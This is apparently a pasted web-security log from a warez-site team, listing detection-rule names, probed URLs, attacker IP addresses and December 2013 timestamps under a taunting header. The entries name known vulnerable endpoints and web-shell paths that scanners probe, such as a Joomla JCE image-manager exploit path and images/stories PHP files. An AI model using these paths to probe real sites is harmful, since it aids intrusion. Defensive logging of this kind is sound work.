scriptz-team

HACKER iDiOTS #135 - YOU WANT IT? YOU GOT IT!

Dec 6th, 2013
16,502
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. THiS iS THE iPs and paths that HACKERz N00Bz TRiED to hack us (expose paths, passwd, error logs etc).
  3. DO NEVER TRY HACK US AGAiN!
  4. EVEN YOU DO MORE AND MORE, WE (NOT ONLY WE AS YOUR iP iS LOGGED BY NOW!) WiLL REPORT YOUR iP!
  5. */
  6.  
  7. Ah god ...
  8.  
  9. -------------------------
  10. LOG: Install, Upgrade Probe
  11. URL: http://www.rlzlog.info/admin.php
  12. IP: 194.228.32.132
  13. DATE: 03-Dec-2013 14:15:20
  14. -------------------------
  15. LOG: Install, Upgrade Probe
  16. URL: http://nzbx.ws/admin.php
  17. IP: 88.101.18.166
  18. DATE: 03-Dec-2013 14:58:15
  19. -------------------------
  20. LOG: Nasty Joomla Probe
  21. URL: http://scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  22. IP: 209.126.254.27
  23. DATE: 03-Dec-2013 15:28:56
  24. -------------------------
  25. LOG: Nasty Joomla Probe
  26. URL: http://scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  27. IP: 209.126.254.27
  28. DATE: 03-Dec-2013 15:28:58
  29. -------------------------
  30. LOG: Images Stories Hack Probe
  31. URL: http://scriptz-team.info/images/stories/beHbeTT.php?rf
  32. IP: 209.126.254.27
  33. DATE: 03-Dec-2013 15:28:59
  34. -------------------------
  35. LOG: Detects common XSS concatenation patterns 1/2
  36. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  37. IP: 50.115.173.241
  38. DATE: 03-Dec-2013 16:47:37
  39. -------------------------
  40. LOG: Detects common XSS concatenation patterns 1/2
  41. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  42. IP: 50.115.173.241
  43. DATE: 03-Dec-2013 16:47:39
  44. -------------------------
  45. LOG: Detects common XSS concatenation patterns 1/2
  46. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  47. IP: 216.107.159.132
  48. DATE: 03-Dec-2013 18:45:01
  49. -------------------------
  50. LOG: Detects common XSS concatenation patterns 1/2
  51. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  52. IP: 216.107.159.132
  53. DATE: 03-Dec-2013 18:45:03
  54. -------------------------
  55. LOG: Install, Upgrade Probe
  56. URL: http://scriptz-team.info/admin.php
  57. IP: 118.174.67.47
  58. DATE: 03-Dec-2013 18:46:42
  59. -------------------------
  60. LOG: Detects common XSS concatenation patterns 1/2
  61. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  62. IP: 142.4.200.151
  63. DATE: 03-Dec-2013 19:26:53
  64. -------------------------
  65. LOG: Detects common XSS concatenation patterns 1/2
  66. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  67. IP: 142.4.200.151
  68. DATE: 03-Dec-2013 19:26:54
  69. -------------------------
  70. LOG: Admin Probe
  71. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/014065-Error-on-viewing-pages.html&sa=U&ei=K_mdUvrELYaWyQOHkoCIBg&ved=0CMsEEBYwXzhk&usg=AFQjCNErqSGDVg87uGrSyzlTJVBNRF5UeA/admin/sqlpatch.php/password_forgotten.php?action=execute
  72. IP: 174.142.46.58
  73. DATE: 03-Dec-2013 19:42:52
  74. -------------------------
  75. LOG: Admin Probe
  76. URL: http://newz.scriptz-team.info/admin/sqlpatch.php/password_forgotten.php?action=execute
  77. IP: 174.142.46.58
  78. DATE: 03-Dec-2013 19:42:53
  79. -------------------------
  80. LOG: Admin Probe
  81. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/admin/sqlpatch.php/password_forgotten.php?action=execute
  82. IP: 174.142.46.58
  83. DATE: 03-Dec-2013 19:42:54
  84. -------------------------
  85. LOG: Admin Probe
  86. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/014065-Error-on-viewing-pages.html&sa=U&ei=N_mdUojMOKWqyQG1loGYAw&ved=0CJwBEBYwGTjIAQ&usg=AFQjCNEB71kv2oK-Ol11NmUk0J2LbE0-5g/admin/sqlpatch.php/password_forgotten.php?action=execute
  87. IP: 174.142.46.58
  88. DATE: 03-Dec-2013 19:43:44
  89. -------------------------
  90. LOG: Detects basic obfuscated JavaScript script injections
  91. URL: http://newz.scriptz-team.info/searchResult/.html
  92. IP: 175.156.144.144
  93. DATE: 03-Dec-2013 19:49:51
  94. -------------------------
  95. LOG: Images Stories Hack Probe
  96. URL: http://newz.scriptz-team.info//images/stories/3xp.php
  97. IP: 103.9.90.211
  98. DATE: 03-Dec-2013 19:52:56
  99. -------------------------
  100. LOG: Detects common XSS concatenation patterns 1/2
  101. URL: http://www.nzbx.ws/article.php?group=test&article=15834+"services4youto.com"&num=100&hl=en&lr=&ct=clnk&sa=U&ei=7_ydUs-mKsn8ywOFhIGADQ&ved=0CMYCECAwOw&usg=AFQjCNHlUtwttpCgaijnE-c9zCUM075VkA
  102. IP: 185.25.84.250
  103. DATE: 03-Dec-2013 19:56:23
  104. -------------------------
  105. LOG: Detects common XSS concatenation patterns 1/2
  106. URL: http://www.nzbx.ws/article.php?group=test&article=15834+"services4youto.com"&num=100&hl=en&lr=&ct=clnk&sa=U&ei=7_ydUvyoKqWwyAOY7YGoDw&ved=0CMYCECAwOw&usg=AFQjCNEg4_675anovO--U7DRFbrszPAIkA
  107. IP: 185.25.84.250
  108. DATE: 03-Dec-2013 19:56:23
  109. -------------------------
  110. LOG: Detects common XSS concatenation patterns 1/2
  111. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  112. IP: 192.3.176.198
  113. DATE: 03-Dec-2013 20:30:49
  114. -------------------------
  115. LOG: Detects common XSS concatenation patterns 1/2
  116. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  117. IP: 192.3.176.198
  118. DATE: 03-Dec-2013 20:30:50
  119. -------------------------
  120. LOG: Install, Upgrade Probe
  121. URL: http://newz.scriptz-team.info/http://www.keralarocks.com/core/install/upgrade.php
  122. IP: 5.16.133.122
  123. DATE: 03-Dec-2013 20:35:04
  124. -------------------------
  125. LOG: Install, Upgrade Probe
  126. URL: http://newz.scriptz-team.info/install/upgrade.php
  127. IP: 5.16.133.122
  128. DATE: 03-Dec-2013 20:35:23
  129. -------------------------
  130. LOG: Detects advanced XSS probings via Script(), RexExp, constructors and XML namespaces
  131. URL: http://www.rlzlog.info/?t=ThisIsGlamour.com.12.10.23.Nicole.Ford.White.Top.And.Tight.Denim.Shorts.XXX.IMAGESET-PAYiSO&date=2013-03-05%2009:55:30&cat=XXX-IMGSET&size=220.0MB%7C49F&key=cc400d08c6cce2b2750418932de4635c
  132. IP: 193.192.58.164
  133. DATE: 03-Dec-2013 20:42:07
  134. -------------------------
  135. LOG: Detects common XSS concatenation patterns 1/2
  136. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  137. IP: 173.236.70.5
  138. DATE: 03-Dec-2013 22:46:09
  139. -------------------------
  140. LOG: Detects common XSS concatenation patterns 1/2
  141. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  142. IP: 173.236.70.5
  143. DATE: 03-Dec-2013 22:46:11
  144. -------------------------
  145. LOG: OFC Probe
  146. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Board-3-0/core/lib/php-ofc-library/ofc_upload_image.php
  147. IP: 206.214.223.167
  148. DATE: 03-Dec-2013 22:51:24
  149. -------------------------
  150. LOG: Install, Upgrade Probe
  151. URL: http://newz.scriptz-team.info/admin.php
  152. IP: 85.130.233.250
  153. DATE: 03-Dec-2013 23:05:09
  154. -------------------------
  155. LOG: Install, Upgrade Probe
  156. URL: http://newz.scriptz-team.info/admin.php
  157. IP: 196.205.230.85
  158. DATE: 03-Dec-2013 23:06:27
  159. -------------------------
  160. LOG: Install, Upgrade Probe
  161. URL: http://www.rlzlog.info/admin.php
  162. IP: 88.103.5.114
  163. DATE: 04-Dec-2013 00:22:29
  164. -------------------------
  165. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  166. URL: http://newz.scriptz-team.info/phpFox-Company-Blog/083475-Vote-for-phpFox-at-Critic%E2%80%99s-Choice-CMS-Awards.html
  167. IP: 75.181.140.69
  168. DATE: 04-Dec-2013 00:36:06
  169. -------------------------
  170. LOG: Detects advanced XSS probings via Script(), RexExp, constructors and XML namespaces
  171. URL: http://rlzlog.info/?t=ThisIsGlamour.com.12.10.17.Jodie.Leigh.Denim.Shirt.With.Kinky.White.Lingerie.XXX.IMAGESET-PAYiSO&date=2013-03-05%2011:21:54&cat=XXX-IMGSET&size=117.0MB%7C28F&key=feff6fe0d6d7e843c58f49c2ab4eb163
  172. IP: 82.242.22.198
  173. DATE: 04-Dec-2013 00:48:56
  174. -------------------------
  175. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  176. URL: http://newz.scriptz-team.info/Kayako-Forums-News-and-Announcements/065586-Holbi%C3%A2%E2%82%AC%E2%84%A2s-Kayako-ITIL-help-desk-implementation-project-for-Haya-Water.html
  177. IP: 146.52.225.33
  178. DATE: 04-Dec-2013 00:57:32
  179. -------------------------
  180. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  181. URL: http://newz.scriptz-team.info/Kayako-Forums-News-and-Announcements/065587-Kayako-exhibiting-in-%C3%A2%E2%82%AC%C5%93HKTDC-International-ICT-Expo-2011%C3%A2%E2%82%AC%C2%B3-Hong-Kong-.html
  182. IP: 146.52.225.33
  183. DATE: 04-Dec-2013 00:57:36
  184. -------------------------
  185. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  186. URL: http://newz.scriptz-team.info/SocialEngine-Announcements/091296-1-1-Billion-is-Pretty-Cool-%E2%80%A6-Online-Communities-Are-Worth-a-Lot-.html
  187. IP: 146.52.225.33
  188. DATE: 04-Dec-2013 00:57:43
  189. -------------------------
  190. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  191. URL: http://newz.scriptz-team.info/Vivvo-CMS-News-and-Press-Releases/016604-Meet-Us-at-From-Business-to-Buttons-Conference-in-Malm%C3%83%C6%92%C3%82%C2%B6-Sweden-.html
  192. IP: 146.52.225.33
  193. DATE: 04-Dec-2013 00:57:47
  194. -------------------------
  195. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  196. URL: http://newz.scriptz-team.info/activeCollab/016598-Quick-tip-Setting-up-the-Client%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%A2%E2%80%9E%C2%A2s-account-in-activeCollab.html
  197. IP: 146.52.225.33
  198. DATE: 04-Dec-2013 00:58:12
  199. -------------------------
  200. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  201. URL: http://newz.scriptz-team.info/activeCollab/06676-Quick-tip-Setting-up-the-Client%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%82%AC%C5%A1%C3%82%C2%AC%C3%83%C2%A2%C3%A2%E2%82%AC%C5%BE%C3%82%C2%A2s-account-in-activeCollab.html
  202. IP: 146.52.225.33
  203. DATE: 04-Dec-2013 00:58:14
  204. -------------------------
  205. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  206. URL: http://newz.scriptz-team.info/print/SocialEngine-PHP-4-6-Released-%E2%80%93-More-improvements-and-bug-fixes.html
  207. IP: 146.52.225.33
  208. DATE: 04-Dec-2013 00:58:21
  209. -------------------------
  210. LOG: Install, Upgrade Probe
  211. URL: http://rlzlog.info/admin.php
  212. IP: 79.177.21.57
  213. DATE: 04-Dec-2013 01:30:53
  214. -------------------------
  215. LOG: Detects common XSS concatenation patterns 1/2
  216. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  217. IP: 83.11.219.192
  218. DATE: 04-Dec-2013 02:55:56
  219. -------------------------
  220. LOG: Detects common XSS concatenation patterns 1/2
  221. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  222. IP: 83.11.219.192
  223. DATE: 04-Dec-2013 02:55:57
  224. -------------------------
  225. LOG: Install, Upgrade Probe
  226. URL: http://www.rlzlog.info/admin.php
  227. IP: 78.1.126.133
  228. DATE: 04-Dec-2013 03:55:14
  229. -------------------------
  230. LOG: Detects basic directory traversal
  231. URL: http://newz.scriptz-team.info/.../clientscript/vbulletin-core.js
  232. IP: 92.113.144.103
  233. DATE: 04-Dec-2013 04:02:10
  234. -------------------------
  235. LOG: Nasty Joomla Probe
  236. URL: http://nzbx.ws/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  237. IP: 144.76.217.17
  238. DATE: 04-Dec-2013 04:11:29
  239. -------------------------
  240. LOG: Nasty Joomla Probe
  241. URL: http://nzbx.ws/article.php?group=nevada&article=169&sa=U&ei=CXOeUsigBKrXyAH62ICQDA&ved=0CMsBEBYwJg&usg=AFQjCNHjzkhnS3XpGldyvd0wL_B951cRYA/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  242. IP: 144.76.217.17
  243. DATE: 04-Dec-2013 04:11:37
  244. -------------------------
  245. LOG: Nasty Joomla Probe
  246. URL: http://nzbx.ws/article.php?group=nevada&article=169&sa=U&ei=C3OeUqznF9Cb1AWu6oCYAw&ved=0CN4BEBYwKA&usg=AFQjCNGrrDCWtqY5H-73aBcrodWE6GVlig/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  247. IP: 144.76.217.17
  248. DATE: 04-Dec-2013 04:11:37
  249. -------------------------
  250. LOG: Nasty Joomla Probe
  251. URL: http://nzbx.ws/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  252. IP: 144.76.217.17
  253. DATE: 04-Dec-2013 04:11:40
  254. -------------------------
  255. LOG: Nasty Joomla Probe
  256. URL: http://nzbx.ws/article.php?group=nevada&article=169&sa=U&ei=CXOeUsigBKrXyAH62ICQDA&ved=0CMsBEBYwJg&usg=AFQjCNHjzkhnS3XpGldyvd0wL_B951cRYA/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  257. IP: 144.76.217.17
  258. DATE: 04-Dec-2013 04:11:42
  259. -------------------------
  260. LOG: Nasty Joomla Probe
  261. URL: http://nzbx.ws/article.php?group=nevada&article=169&sa=U&ei=DXOeUq-hMaKTyQGk2YCQBQ&ved=0CNkBEBYwJw&usg=AFQjCNHeuZTS9oylR-NszvsPd6RgJuiYKQ/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  262. IP: 144.76.217.17
  263. DATE: 04-Dec-2013 04:11:43
  264. -------------------------
  265. LOG: Nasty Joomla Probe
  266. URL: http://nzbx.ws/article.php?group=nevada&article=169&sa=U&ei=C3OeUqznF9Cb1AWu6oCYAw&ved=0CN4BEBYwKA&usg=AFQjCNGrrDCWtqY5H-73aBcrodWE6GVlig/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  267. IP: 144.76.217.17
  268. DATE: 04-Dec-2013 04:11:45
  269. -------------------------
  270. LOG: Nasty Joomla Probe
  271. URL: http://nzbx.ws/article.php?group=nevada&article=169&sa=U&ei=EnOeUoeJHM7WrQHomoC4Aw&ved=0CNsBEBYwKQ&usg=AFQjCNHHB38AEMD3Pyaj_UbgN93LJtxMhw/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  272. IP: 144.76.217.17
  273. DATE: 04-Dec-2013 04:11:46
  274. -------------------------
  275. LOG: Nasty Joomla Probe
  276. URL: http://nzbx.ws/article.php?group=nevada&article=169&sa=U&ei=EnOeUoeJHM7WrQHomoC4Aw&ved=0CNsBEBYwKQ&usg=AFQjCNHHB38AEMD3Pyaj_UbgN93LJtxMhw/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  277. IP: 144.76.217.17
  278. DATE: 04-Dec-2013 04:11:47
  279. -------------------------
  280. LOG: Images Stories Hack Probe
  281. URL: http://nzbx.ws/article.php?group=nevada&article=169&sa=U&ei=EnOeUoeJHM7WrQHomoC4Aw&ved=0CNsBEBYwKQ&usg=AFQjCNHHB38AEMD3Pyaj_UbgN93LJtxMhw//images/stories/helper.php?rf
  282. IP: 144.76.217.17
  283. DATE: 04-Dec-2013 04:11:48
  284. -------------------------
  285. LOG: Images Stories Hack Probe
  286. URL: http://nzbx.ws/article.php?group=nevada&article=169&sa=U&ei=CXOeUsigBKrXyAH62ICQDA&ved=0CMsBEBYwJg&usg=AFQjCNHjzkhnS3XpGldyvd0wL_B951cRYA//images/stories/helper.php?rf
  287. IP: 144.76.217.17
  288. DATE: 04-Dec-2013 04:11:51
  289. -------------------------
  290. LOG: Nasty Joomla Probe
  291. URL: http://nzbx.ws/article.php?group=nevada&article=169&sa=U&ei=DXOeUq-hMaKTyQGk2YCQBQ&ved=0CNkBEBYwJw&usg=AFQjCNHeuZTS9oylR-NszvsPd6RgJuiYKQ/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  292. IP: 144.76.217.17
  293. DATE: 04-Dec-2013 04:12:10
  294. -------------------------
  295. LOG: Install, Upgrade Probe
  296. URL: http://nzbx.ws/admin.php
  297. IP: 190.43.174.64
  298. DATE: 04-Dec-2013 04:41:39
  299. -------------------------
  300. LOG: Admin Probe
  301. URL: http://www.protectionx.info/admin/help/online_help_1.htm
  302. IP: 183.60.243.190
  303. DATE: 04-Dec-2013 05:02:19
  304. -------------------------
  305. LOG: Admin Probe
  306. URL: http://www.protectionx.info/admin/template/foot.htm
  307. IP: 183.60.243.190
  308. DATE: 04-Dec-2013 05:02:20
  309. -------------------------
  310. LOG: Admin Probe
  311. URL: http://www.protectionx.info/admin/template/article_more/config.htm
  312. IP: 183.60.243.190
  313. DATE: 04-Dec-2013 05:02:20
  314. -------------------------
  315. LOG: Admin Probe
  316. URL: http://www.protectionx.info/data/admin/ver.txt
  317. IP: 183.60.243.190
  318. DATE: 04-Dec-2013 05:02:21
  319. -------------------------
  320. LOG: Admin Probe
  321. URL: http://www.protectionx.info/admin/inc/xml.xslt
  322. IP: 183.60.243.190
  323. DATE: 04-Dec-2013 05:02:23
  324. -------------------------
  325. LOG: Admin Probe
  326. URL: http://www.protectionx.info/admin/tpls/tpls/main/default/index.tpl
  327. IP: 183.60.243.190
  328. DATE: 04-Dec-2013 05:02:23
  329. -------------------------
  330. LOG: Admin Probe
  331. URL: http://www.protectionx.info/admin/javascript/typecho.js
  332. IP: 183.60.243.190
  333. DATE: 04-Dec-2013 05:02:24
  334. -------------------------
  335. LOG: Admin Probe
  336. URL: http://www.protectionx.info/Admin/Include/version.xml
  337. IP: 183.60.243.190
  338. DATE: 04-Dec-2013 05:02:24
  339. -------------------------
  340. LOG: Admin Probe
  341. URL: http://www.protectionx.info/admin/list.html
  342. IP: 183.60.243.190
  343. DATE: 04-Dec-2013 05:02:25
  344. -------------------------
  345. LOG: Admin Probe
  346. URL: http://www.protectionx.info/admin/static/css/style.css
  347. IP: 183.60.243.190
  348. DATE: 04-Dec-2013 05:02:26
  349. -------------------------
  350. LOG: Detects specific directory and path traversal
  351. URL: http://www.protectionx.info/usr/themes/default/sytle.css
  352. IP: 183.60.243.190
  353. DATE: 04-Dec-2013 05:02:26
  354. -------------------------
  355. LOG: Detects specific directory and path traversal
  356. URL: http://www.protectionx.info/public/home/js/main.js
  357. IP: 183.60.243.190
  358. DATE: 04-Dec-2013 05:02:26
  359. -------------------------
  360. LOG: Detects specific directory and path traversal
  361. URL: http://www.protectionx.info/system/skins/default/system.login.htm
  362. IP: 183.60.243.190
  363. DATE: 04-Dec-2013 05:02:28
  364. -------------------------
  365. LOG: Detects specific directory and path traversal
  366. URL: http://www.protectionx.info/app/code/core/Mage/Admin/etc/config.xml
  367. IP: 183.60.243.190
  368. DATE: 04-Dec-2013 05:02:28
  369. -------------------------
  370. LOG: Admin Probe
  371. URL: http://www.protectionx.info/admin/js/command.js
  372. IP: 183.60.243.190
  373. DATE: 04-Dec-2013 05:02:29
  374. -------------------------
  375. LOG: Detects specific directory and path traversal
  376. URL: http://www.protectionx.info/system/language/zh-cn.xml
  377. IP: 183.60.243.190
  378. DATE: 04-Dec-2013 05:02:29
  379. -------------------------
  380. LOG: Admin Probe
  381. URL: http://www.protectionx.info/admin/tpl/showmessage.htm
  382. IP: 183.60.243.190
  383. DATE: 04-Dec-2013 05:02:30
  384. -------------------------
  385. LOG: Admin Probe
  386. URL: http://www.protectionx.info/admin/tpl/footer.htm
  387. IP: 183.60.243.190
  388. DATE: 04-Dec-2013 05:02:33
  389. -------------------------
  390. LOG: Detects self contained xss via with(), common loops and regex to string conversion
  391. URL: http://www.protectionx.info/xml_language/lang[arabic].xml
  392. IP: 183.60.243.190
  393. DATE: 04-Dec-2013 05:02:34
  394. -------------------------
  395. LOG: Admin Probe
  396. URL: http://www.protectionx.info/images/admin/admin.css
  397. IP: 183.60.243.190
  398. DATE: 04-Dec-2013 05:02:36
  399. -------------------------
  400. LOG: Admin Probe
  401. URL: http://www.protectionx.info/admin/licence
  402. IP: 183.60.243.190
  403. DATE: 04-Dec-2013 05:02:36
  404. -------------------------
  405. LOG: Admin Probe
  406. URL: http://www.protectionx.info/admin/login.aspx
  407. IP: 183.60.243.190
  408. DATE: 04-Dec-2013 05:02:37
  409. -------------------------
  410. LOG: Detects specific directory and path traversal
  411. URL: http://www.protectionx.info/system/templates/default12/images/js.js
  412. IP: 183.60.243.190
  413. DATE: 04-Dec-2013 05:02:38
  414. -------------------------
  415. LOG: Detects very basic XSS probings
  416. URL: http://www.protectionx.info/Southidceditor/Dialog/about.htm
  417. IP: 183.60.243.190
  418. DATE: 04-Dec-2013 05:02:39
  419. -------------------------
  420. LOG: Admin Probe
  421. URL: http://www.protectionx.info/admin/jscripts/imodal.js
  422. IP: 183.60.243.190
  423. DATE: 04-Dec-2013 05:02:40
  424. -------------------------
  425. LOG: Admin Probe
  426. URL: http://www.protectionx.info/admin/jscripts/codepress/languages/codepress-mybb.css
  427. IP: 183.60.243.190
  428. DATE: 04-Dec-2013 05:02:40
  429. -------------------------
  430. LOG: Detects very basic XSS probings
  431. URL: http://www.protectionx.info/admin/Southidceditor/Dialog/about.htm
  432. IP: 183.60.243.190
  433. DATE: 04-Dec-2013 05:02:42
  434. -------------------------
  435. LOG: Admin Probe
  436. URL: http://www.protectionx.info/admin/Southidceditor/js/buttons.js
  437. IP: 183.60.243.190
  438. DATE: 04-Dec-2013 05:02:42
  439. -------------------------
  440. LOG: Detects very basic XSS probings
  441. URL: http://www.protectionx.info/eWebEditor/Dialog/about.htm
  442. IP: 183.60.243.190
  443. DATE: 04-Dec-2013 05:02:44
  444. -------------------------
  445. LOG: Detects very basic XSS probings
  446. URL: http://www.protectionx.info/editor/Dialog/about.htm
  447. IP: 183.60.243.190
  448. DATE: 04-Dec-2013 05:02:45
  449. -------------------------
  450. LOG: Admin Probe
  451. URL: http://www.protectionx.info/admin/login.asp
  452. IP: 183.60.243.190
  453. DATE: 04-Dec-2013 05:02:45
  454. -------------------------
  455. LOG: Admin Probe
  456. URL: http://www.protectionx.info/phpldapadmin/lib/ldap_error_codes.txt
  457. IP: 183.60.243.190
  458. DATE: 04-Dec-2013 05:02:46
  459. -------------------------
  460. LOG: Admin Probe
  461. URL: http://www.protectionx.info/admin/kindeditor/kindeditor-min.js
  462. IP: 183.60.243.190
  463. DATE: 04-Dec-2013 05:02:47
  464. -------------------------
  465. LOG: Admin Probe
  466. URL: http://www.protectionx.info/cms4jadmin/login.jsp
  467. IP: 183.60.243.190
  468. DATE: 04-Dec-2013 05:02:48
  469. -------------------------
  470. LOG: Admin Probe
  471. URL: http://www.protectionx.info/admin/includes/stylesheet.css
  472. IP: 183.60.243.190
  473. DATE: 04-Dec-2013 05:02:48
  474. -------------------------
  475. LOG: Admin Probe
  476. URL: http://www.protectionx.info/cms4jadmin/skin/blue/css/icon.css
  477. IP: 183.60.243.190
  478. DATE: 04-Dec-2013 05:02:48
  479. -------------------------
  480. LOG: Detects concatenated basic SQL injection and SQLLFI attempts
  481. URL: http://www.protectionx.info/update.txt
  482. IP: 183.60.243.190
  483. DATE: 04-Dec-2013 05:02:49
  484. -------------------------
  485. LOG: Admin Probe
  486. URL: http://www.protectionx.info/admin/kindeditor/kindeditor.js
  487. IP: 183.60.243.190
  488. DATE: 04-Dec-2013 05:02:50
  489. -------------------------
  490. LOG: Admin Probe
  491. URL: http://www.protectionx.info/admin/templates/aboutus.html
  492. IP: 183.60.243.190
  493. DATE: 04-Dec-2013 05:02:51
  494. -------------------------
  495. LOG: Admin Probe
  496. URL: http://www.protectionx.info/admin/view/template/common/header.tpl
  497. IP: 183.60.243.190
  498. DATE: 04-Dec-2013 05:02:51
  499. -------------------------
  500. LOG: Admin Probe
  501. URL: http://www.protectionx.info/templates/admin/help.html
  502. IP: 183.60.243.190
  503. DATE: 04-Dec-2013 05:02:53
  504. -------------------------
  505. LOG: Admin Probe
  506. URL: http://www.protectionx.info/application/Plugin/Example/View/admin/index.tpl
  507. IP: 183.60.243.190
  508. DATE: 04-Dec-2013 05:02:53
  509. -------------------------
  510. LOG: Admin Probe
  511. URL: http://www.protectionx.info/control/admin/tpl/admin_config_integration_pw.htm
  512. IP: 183.60.243.190
  513. DATE: 04-Dec-2013 05:02:53
  514. -------------------------
  515. LOG: Admin Probe
  516. URL: http://www.protectionx.info/admin/kindeditor/license.txt
  517. IP: 183.60.243.190
  518. DATE: 04-Dec-2013 05:02:53
  519. -------------------------
  520. LOG: Admin Probe
  521. URL: http://www.protectionx.info/external/modules/datacall/templates/admin/header.html
  522. IP: 183.60.243.190
  523. DATE: 04-Dec-2013 05:02:53
  524. -------------------------
  525. LOG: Admin Probe
  526. URL: http://www.protectionx.info/www/admin/templates/install/register-step.html
  527. IP: 183.60.243.190
  528. DATE: 04-Dec-2013 05:02:55
  529. -------------------------
  530. LOG: Admin Probe
  531. URL: http://www.protectionx.info/admin/views/style/default/style.css
  532. IP: 183.60.243.190
  533. DATE: 04-Dec-2013 05:02:55
  534. -------------------------
  535. LOG: Install, Upgrade Probe
  536. URL: http://www.protectionx.info/install.php
  537. IP: 183.60.243.190
  538. DATE: 04-Dec-2013 05:02:56
  539. -------------------------
  540. LOG: Admin Probe
  541. URL: http://www.protectionx.info/phpmyadmin/README
  542. IP: 183.60.243.190
  543. DATE: 04-Dec-2013 05:02:57
  544. -------------------------
  545. LOG: Admin Probe
  546. URL: http://www.protectionx.info/admin/tpl/backup.htm
  547. IP: 183.60.243.190
  548. DATE: 04-Dec-2013 05:02:57
  549. -------------------------
  550. LOG: Detects specific directory and path traversal
  551. URL: http://www.protectionx.info/admin/bicq/system/js/window.js
  552. IP: 183.60.243.190
  553. DATE: 04-Dec-2013 05:02:58
  554. -------------------------
  555. LOG: Admin Probe
  556. URL: http://www.protectionx.info/phpmyadmin/Documentation.txt
  557. IP: 183.60.243.190
  558. DATE: 04-Dec-2013 05:03:08
  559. -------------------------
  560. LOG: Admin Probe
  561. URL: http://www.protectionx.info/phpmyadmin/ChangeLog
  562. IP: 183.60.243.190
  563. DATE: 04-Dec-2013 05:03:09
  564. -------------------------
  565. LOG: Admin Probe
  566. URL: http://www.protectionx.info/phpmyadmin/docs.css
  567. IP: 183.60.243.190
  568. DATE: 04-Dec-2013 05:03:11
  569. -------------------------
  570. LOG: Detects nullbytes and other dangerous characters
  571. URL: http://www.rlzlog.info/search.php?q=%09Justin_Timberlake-The_20-20_Experience_The_Complete_Experience&sort=
  572. IP: 96.250.59.50
  573. DATE: 04-Dec-2013 05:05:09
  574. -------------------------
  575. LOG: Install, Upgrade Probe
  576. URL: http://newz.scriptz-team.info/IPS-Beyond-Forums/admin.php
  577. IP: 109.254.19.34
  578. DATE: 04-Dec-2013 08:55:47
  579. -------------------------
  580. LOG: Detects common XSS concatenation patterns 1/2
  581. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  582. IP: 208.89.213.48
  583. DATE: 04-Dec-2013 10:37:31
  584. -------------------------
  585. LOG: Detects common XSS concatenation patterns 1/2
  586. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  587. IP: 208.89.213.48
  588. DATE: 04-Dec-2013 10:37:33
  589. -------------------------
  590. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  591. URL: http://newz.scriptz-team.info/Kayako-Forums-News-and-Announcements/095692-Roundup-What%E2%80%99s-New-in-Kayako.html
  592. IP: 204.12.251.242
  593. DATE: 04-Dec-2013 11:47:37
  594. -------------------------
  595. LOG: Detects common XSS concatenation patterns 1/2
  596. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  597. IP: 184.154.141.188
  598. DATE: 04-Dec-2013 11:54:27
  599. -------------------------
  600. LOG: Detects common XSS concatenation patterns 1/2
  601. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  602. IP: 184.154.141.188
  603. DATE: 04-Dec-2013 11:54:29
  604. -------------------------
  605. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  606. URL: http://newz.scriptz-team.info/vBulletin-ImpEx/064009-IMPX-405-We-seriously-need-a-module-f%C3%EF%BF%BD%C6%EF%BF%BD%C3%EF%BF%BD%C2%BCr-Wordpress-3.html
  607. IP: 157.55.35.100
  608. DATE: 04-Dec-2013 12:27:37
  609. -------------------------
  610. LOG: Nasty Joomla Probe
  611. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  612. IP: 88.81.91.170
